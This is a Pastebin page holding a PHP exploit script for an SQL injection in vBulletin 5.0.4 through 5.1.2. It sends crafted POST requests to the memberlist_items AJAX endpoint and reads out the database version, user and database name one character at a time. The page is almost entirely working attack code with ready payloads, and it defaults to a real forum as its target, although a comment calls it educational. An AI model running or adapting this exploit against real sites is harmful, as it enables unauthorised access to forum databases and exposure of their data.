SHARE
TWEET

[SCRIPT]=> EXPLOIT vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.

Googleinurl Sep 3rd, 2014 2,530 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. /*
  4. Inyección SQL en los foros vBulletin 5.0.4, 5.0.5, 5.1.0, 5.1.1 y 5.1.2 (Exploit + Video)
  5. http://www.blackploit.com/2014/07/inyeccion-sql-en-los-foros-vbulletin.html
  6.     Author: Nytro
  7.     Powered by: Romanian Security Team
  8.     Price: Free. Educational.
  9. */
  10.  
  11.  
  12. error_reporting(E_ALL);
  13. ini_set('display_errors', 1);
  14.  
  15.  
  16. // Get arguments
  17.  
  18.  
  19. $target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
  20. $expression = str_replace('/', '\\/', $target_url);
  21.  
  22.  
  23. // Function to send a POST request
  24.  
  25.  
  26. function httpPost($url,$params)
  27. {
  28.     $ch = curl_init($url);
  29.  
  30.  
  31.     curl_setopt($ch, CURLOPT_URL,$url);
  32.     curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
  33.     curl_setopt($ch, CURLOPT_HEADER, false);
  34.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  35.     curl_setopt($ch, CURLOPT_POST, 1);
  36.     curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
  37.      
  38.     curl_setopt($ch, CURLOPT_HTTPHEADER, array(
  39.         'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  40.         'Accept: application/json, text/javascript, */*; q=0.01',
  41.         'X-Requested-With: XMLHttpRequest',
  42.         'Referer: https://rstforums.com/v5/memberlist',
  43.         'Accept-Language: en-US,en;q=0.5',
  44.         'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
  45.      ));
  46.  
  47.  
  48.     $output = curl_exec($ch);
  49.      
  50.     if($output == FALSE) print htmlspecialchars(curl_error($ch));
  51.  
  52.  
  53.     curl_close($ch);
  54.     return $output;
  55. }
  56.  
  57.  
  58. // Function to get string between two other strings
  59.  
  60.  
  61. function get_string_between($string, $start, $end)
  62. {
  63.     $string = " ".$string;
  64.     $ini = strpos($string,$start);
  65.     if ($ini == 0) return "";
  66.     $ini += strlen($start);
  67.     $len = strpos($string,$end,$ini) - $ini;
  68.     return substr($string,$ini,$len);
  69. }
  70.  
  71.  
  72. // Get version
  73.  
  74.  
  75. print "\r\nRomanian Security Team - vBulltin 5.1.2 SQL Injection\r\n\r\n";
  76. print "Version: ";
  77.  
  78.  
  79. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  80.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1  ,1)--+"+' .
  81.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  82.  
  83.  
  84. $letter = 1;
  85.  
  86.  
  87. while(strpos($result, 'No Users Matched Your Query') == false)
  88. {
  89.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  90.  
  91.  
  92.     $username = get_string_between($exploded[1], '">', '<\/a>');
  93.     print $username[0];
  94.      
  95.     $letter++;
  96.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  97.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(  ),' . $letter . ',1)--+"+' .
  98.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  99. }
  100.  
  101.  
  102. // Get user
  103.  
  104.  
  105. print "\r\nUser: ";
  106.  
  107.  
  108. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  109.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),1  ,1)--+"+' .
  110.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  111.  
  112.  
  113. $letter = 1;
  114.  
  115.  
  116. while(strpos($result, 'No Users Matched Your Query') == false)
  117. {
  118.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  119.  
  120.  
  121.     $username = get_string_between($exploded[1], '">', '<\/a>');
  122.     print $username[0];
  123.  
  124.  
  125.     $letter++;
  126.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  127.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(user(),' . $letter . ',1)--+"+' .
  128.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  129. }
  130.  
  131.  
  132. // Get database
  133.  
  134.  
  135. print "\r\nDatabse: ";
  136.  
  137.  
  138. $result = httpPost($target_url . '/ajax/render/memberlist_items',
  139.         'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  1,1)--+"+' .
  140.         '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  141.  
  142.  
  143. $letter = 1;
  144.  
  145.  
  146. while(strpos($result, 'No Users Matched Your Query') == false)
  147. {
  148.     $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
  149.  
  150.  
  151.     $username = get_string_between($exploded[1], '">', '<\/a>');
  152.     print $username[0];
  153.  
  154.  
  155.     $letter++;
  156.     $result = httpPost($target_url . '/ajax/render/memberlist_items',
  157.             'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(database(),  ' . $letter . ',1)--+"+' .
  158.             '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
  159. }
  160.  
  161.  
  162. print "\r\n"
  163.  
  164.  
  165. ?>
RAW Paste Data
Top